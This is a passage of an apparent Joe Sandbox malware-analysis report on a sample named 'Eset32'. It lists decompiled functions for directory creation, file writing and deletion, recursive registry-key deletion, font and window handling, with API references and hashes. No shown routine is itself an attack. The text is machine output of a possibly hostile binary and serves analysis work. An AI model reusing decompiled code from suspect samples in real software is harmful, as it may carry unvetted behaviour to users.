                                                          • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004056E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004056E4(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                                                          0x004056ef
                                                          0x004056f3
                                                          0x004056f6
                                                          0x004056fc
                                                          0x00405700
                                                          0x00405704
                                                          0x0040570c
                                                          0x00405713
                                                          0x00405719
                                                          0x00405720
                                                          0x0040572f
                                                          0x00405731
                                                          0x00000000
                                                          0x00405731
                                                          0x0040573b
                                                          0x00405742
                                                          0x00405758
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040575a
                                                          0x0040575e

                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • GetLastError.KERNEL32 ref: 0040573B
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                          • GetLastError.KERNEL32 ref: 0040575A
                                                          Strings
                                                          • C:\Users\user\Desktop, xrefs: 004056E4
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                          • API String ID: 3449924974-1521822154
                                                          • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                          • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004027DF Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E004027DF(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AFC(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C6B(_t50);
				_t26 = E00405C90(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f438;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403300(_t45);
						E004032EA(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E004030D8();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                          0x004027df
                                                          0x004027e1
                                                          0x004027ed
                                                          0x004027f0
                                                          0x004027fa
                                                          0x004027fe
                                                          0x004027fe
                                                          0x00402804
                                                          0x00402811
                                                          0x00402819
                                                          0x0040281c
                                                          0x00402822
                                                          0x00402830
                                                          0x00402835
                                                          0x00402839
                                                          0x0040283c
                                                          0x00402845
                                                          0x00402851
                                                          0x00402855
                                                          0x00402858
                                                          0x0040285a
                                                          0x0040285d
                                                          0x0040285e
                                                          0x0040285f
                                                          0x00402862
                                                          0x00402887
                                                          0x00402869
                                                          0x0040286e
                                                          0x00402876
                                                          0x0040287c
                                                          0x00402881
                                                          0x00402881
                                                          0x0040288e
                                                          0x0040288e
                                                          0x0040289b
                                                          0x004028a1
                                                          0x004028a7
                                                          0x004028a8
                                                          0x004028a9
                                                          0x004028ac
                                                          0x004028b3
                                                          0x004028b3
                                                          0x004028b9
                                                          0x004028b9
                                                          0x004028c4
                                                          0x004028c5
                                                          0x004028c9
                                                          0x004028cd
                                                          0x004028d3
                                                          0x004028d3
                                                          0x004028da
                                                          0x004022dd
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                          • GlobalFree.KERNEL32 ref: 0040288E
                                                          • GlobalFree.KERNEL32 ref: 004028A1
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                          • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 48%
                                                          			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406500(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                          0x00402cdb
                                                          0x00402ce4
                                                          0x00402ced
                                                          0x00402cf9
                                                          0x00402d02
                                                          0x00402d0c
                                                          0x00402d31
                                                          0x00402d37
                                                          0x00402d3c
                                                          0x00402d3d
                                                          0x00402d6d
                                                          0x00402d46
                                                          0x00402d48
                                                          0x00402d98
                                                          0x00402d9b
                                                          0x00000000
                                                          0x00402da1
                                                          0x00402d57
                                                          0x00402d5c
                                                          0x00402d5e
                                                          0x00000000
                                                          0x00000000
                                                          0x00402d66
                                                          0x00402d6b
                                                          0x00402d6c
                                                          0x00402d6c
                                                          0x00402d79
                                                          0x00402d81
                                                          0x00402d88
                                                          0x00000000
                                                          0x00402db1
                                                          0x00000000
                                                          0x00402d90
                                                          0x00402d1c
                                                          0x00402d2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402d2f
                                                          0x00402db7

                                                          APIs
                                                          • RegEnumValueA.ADVAPI32 ref: 00402D24
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                          • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                          0x00401d65
                                                          0x00401d69
                                                          0x00401d7e
                                                          0x00401d6b
                                                          0x00401d6d
                                                          0x00401d73
                                                          0x00401d73
                                                          0x00401d84
                                                          0x00401d87
                                                          0x00401d91
                                                          0x00401d94
                                                          0x00401d9c
                                                          0x00401dad
                                                          0x00401db0
                                                          0x00401dbb
                                                          0x00401db2
                                                          0x00401db4
                                                          0x00401db4
                                                          0x00401dbf
                                                          0x00401dcc
                                                          0x00401df3
                                                          0x00401e02
                                                          0x00401e10
                                                          0x00401e18
                                                          0x00401e20
                                                          0x00401e20
                                                          0x00401e29
                                                          0x00401e2f
                                                          0x004029a5
                                                          0x004029a5
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                          • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401E35 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b848 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b84f = 1;
				 *0x40b84c = _t15 & 0x00000001;
				 *0x40b84d = _t15 & 0x00000002;
				 *0x40b84e = _t15 & 0x00000004;
				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b838);
				_push(_t18);
				_push(_t33);
				E00406055();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                          0x00401e35
                                                          0x00401e40
                                                          0x00401e42
                                                          0x00401e4f
                                                          0x00401e66
                                                          0x00401e6b
                                                          0x00401e78
                                                          0x00401e7d
                                                          0x00401e81
                                                          0x00401e8c
                                                          0x00401e93
                                                          0x00401ea5
                                                          0x00401eab
                                                          0x00401eb0
                                                          0x00401eba
                                                          0x00402620
                                                          0x00401569
                                                          0x004029a5
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E38
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                          • ReleaseDC.USER32 ref: 00401E6B
                                                          • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: b428dbf066e451782afb30897d59d51ceb01418a72ff73eea60025d7aa45f1e0
                                                          • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                          • Opcode Fuzzy Hash: b428dbf066e451782afb30897d59d51ceb01418a72ff73eea60025d7aa45f1e0
                                                          • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                          0x00401c2e
                                                          0x00401c30
                                                          0x00401c37
                                                          0x00401c3a
                                                          0x00401c3d
                                                          0x00401c47
                                                          0x00401c4b
                                                          0x00401c4e
                                                          0x00401c57
                                                          0x00401c57
                                                          0x00401c5a
                                                          0x00401c5e
                                                          0x00401c67
                                                          0x00401c67
                                                          0x00401c6a
                                                          0x00401c6e
                                                          0x00401c70
                                                          0x00401cc5
                                                          0x00401cc7
                                                          0x00401cd0
                                                          0x00401cd8
                                                          0x00401cdb
                                                          0x00401cdb
                                                          0x00401ce4
                                                          0x00000000
                                                          0x00401c72
                                                          0x00401c79
                                                          0x00401c7b
                                                          0x00401c7e
                                                          0x00401c84
                                                          0x00401c8b
                                                          0x00401c8e
                                                          0x00401cb6
                                                          0x00401cea
                                                          0x00401cea
                                                          0x00401c90
                                                          0x00401c9e
                                                          0x00401ca6
                                                          0x00401ca9
                                                          0x00401ca9
                                                          0x00401c8e
                                                          0x00401ced
                                                          0x00401cf0
                                                          0x00401cf6
                                                          0x004029a5
                                                          0x004029a5
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                          • SendMessageA.USER32 ref: 00401CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                          • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                          • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                          • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004049C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
			}



















                                                          0x004049ca
                                                          0x004049cf
                                                          0x004049d7
                                                          0x004049d8
                                                          0x004049e5
                                                          0x004049ed
                                                          0x004049ee
                                                          0x004049f0
                                                          0x004049f2
                                                          0x004049f4
                                                          0x004049f7
                                                          0x004049f7
                                                          0x004049fe
                                                          0x00404a04
                                                          0x00404a04
                                                          0x00404a0b
                                                          0x00404a12
                                                          0x00404a15
                                                          0x00404a18
                                                          0x00404a18
                                                          0x00404a1c
                                                          0x00404a2c
                                                          0x00404a2e
                                                          0x00404a31
                                                          0x004049da
                                                          0x004049da
                                                          0x004049e1
                                                          0x004049e1
                                                          0x00404a39
                                                          0x00404a44
                                                          0x00404a5a
                                                          0x00404a6a
                                                          0x00404a86

                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                          • wsprintfA.USER32 ref: 00404A6A
                                                          • SetDlgItemTextA.USER32 ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
